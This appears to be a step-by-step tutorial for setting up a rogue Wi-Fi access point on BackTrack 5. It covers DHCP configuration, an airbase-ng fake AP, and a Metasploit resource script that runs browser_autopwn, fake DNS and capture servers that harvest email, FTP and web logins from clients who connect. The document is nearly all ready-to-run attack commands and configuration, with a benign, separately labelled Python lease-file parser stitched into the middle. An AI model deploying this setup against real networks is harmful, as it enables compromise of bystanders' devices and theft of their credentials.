0x00. Environment setup
OS : BackTrack 5 R3 (32-bit)
Kernel : Linux bt 3.2.6
# netstat -nltp
0x01. dhcp3-server install
# vi /etc/apt/sources.list
deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://64.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing
# apt-get install dhcp3-server
0x02. dhcpd.conf
# vi /etc/dhcp3/dhcpd.conf
option domain-name-servers 10.0.0.1;
#default-lease-time 600;
max-lease-time 720;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
    range 10.0.0.100 10.0.0.254;
    option routers 10.0.0.1;
    option domain-name-servers 10.0.0.1;
}
0x03. karma.rc
# vi /root/karma.rc
load db_sqlite3
db_create /root/karma.db
use auxiliary/server/browser_autopwn
setg AUTOPWN_HOST 10.0.0.1
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads
set LHOST 10.0.0.1
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads
run
use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run
use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run
use auxiliary/server/capture/ftp
run
use auxiliary/server/capture/imap
set SSL false
set SRVPORT 143
run
use auxiliary/server/capture/imap
set SSL true
set SRVPORT 993
run
use auxiliary/server/capture/smtp
set SSL false
set SRVPORT 25
run
use auxiliary/server/capture/smtp
set SSL true
set SRVPORT 465
run
use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 5353
run
use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 53
run
use auxiliary/server/capture/http
set SRVPORT 80
set SSL false
run
use auxiliary/server/capture/http
set SRVPORT 8080
set SSL false
run
use auxiliary/server/capture/http
set SRVPORT 443
set SSL true
run
use auxiliary/server/capture/http
set SRVPORT 8443
set SSL true
run
0x04. iwconfig
Configure a wireless network interface.
iwconfig is similar to ifconfig, but is dedicated to the wireless interfaces.
# iwconfig
0x05. airmon-ng
airmon-ng is a script that can be used to enable monitor mode on wireless interfaces.
airmon-ng <start|stop> <interface>
# airmon-ng start wlan0
0x06. airbase-ng
Multi-purpose tool aimed at attacking clients as opposed to the Access Point (AP) itself.
airbase-ng [options] <interface>
[Options]
-y
: When using this option, the fake AP will not respond to broadcast probes.
-c <channel>
: This is used to specify the channel on which to run the Access Point.
[Filter options]
-e <ESSID>
--essid <ESSID>
: Specify a single ESSID.
# airbase-ng -y -c 9 -e "Fake-AP" mon0
0x07. Virtual NIC at0 config
# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
# route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
# ifconfig at0
0x08. DHCP Server Activation
# mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
# dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0
# cat /var/lib/dhcp3/dhcpd.leases
This file records the lease information for the IP addresses that the DHCP server has assigned to client hosts.
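The lease file is plain text in ISC dhcpd's block syntax, and dhcpd appends a new block whenever a lease changes, so the same IP can appear several times. The parser below is an added example, not part of the original post; the sample entries and the names parse_leases and active_leases are constructed for illustration.

```python
import re
from datetime import datetime
# Constructed sample in ISC dhcpd lease-file syntax (not taken from the page).
SAMPLE = """\
lease 10.0.0.100 {
  ends 2 2013/01/15 10:12:00;
  binding state active;
  hardware ethernet 00:11:22:33:44:55;
}
lease 10.0.0.101 {
  ends 2 2013/01/15 10:17:00;
  binding state active;
  next binding state free;
  hardware ethernet 66:77:88:99:aa:bb;
}
lease 10.0.0.100 {
  ends 2 2013/01/15 10:18:00;
  binding state active;
  hardware ethernet 00:11:22:33:44:55;
  client-hostname "laptop-a";
}
"""

# A block runs from "lease <ip> {" to the closing brace at column 0.
BLOCK = re.compile(r"^lease\s+(\S+)\s*\{(.*?)^\}", re.S | re.M)
FIELDS = {
    "ends": r"^\s*ends\s+\d\s+([\d/]+ [\d:]+);",
    "state": r"^\s*binding state\s+(\w+);",  # "^" skips "next binding state"
    "mac": r"^\s*hardware ethernet\s+([0-9a-fA-F:]{17});",
    "hostname": r'^\s*client-hostname\s+"([^"]*)";',
}

def parse_leases(text):
    """Return {ip: record}, keeping only the last block written per IP."""
    leases = {}
    for ip, body in BLOCK.findall(text):
        found = {k: re.search(p, body, re.M) for k, p in FIELDS.items()}
        rec = {k: m.group(1) if m else None for k, m in found.items()}
        if rec["ends"]:  # lease timestamps are UTC by default
            rec["ends"] = datetime.strptime(rec["ends"], "%Y/%m/%d %H:%M:%S")
        leases[ip] = rec  # dhcpd appends on renewal, so later blocks win
    return leases

def active_leases(text):
    """Map IP -> MAC for addresses whose latest block is 'active'."""
    return {ip: r["mac"] for ip, r in parse_leases(text).items()
            if r["state"] == "active"}

if __name__ == "__main__":
    print(active_leases(SAMPLE))
```

To use it on the lab host, pass the contents of /var/lib/dhcp3/dhcpd.leases to parse_leases instead of SAMPLE.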
0x09. Metasploit
# msfconsole -r karma.rc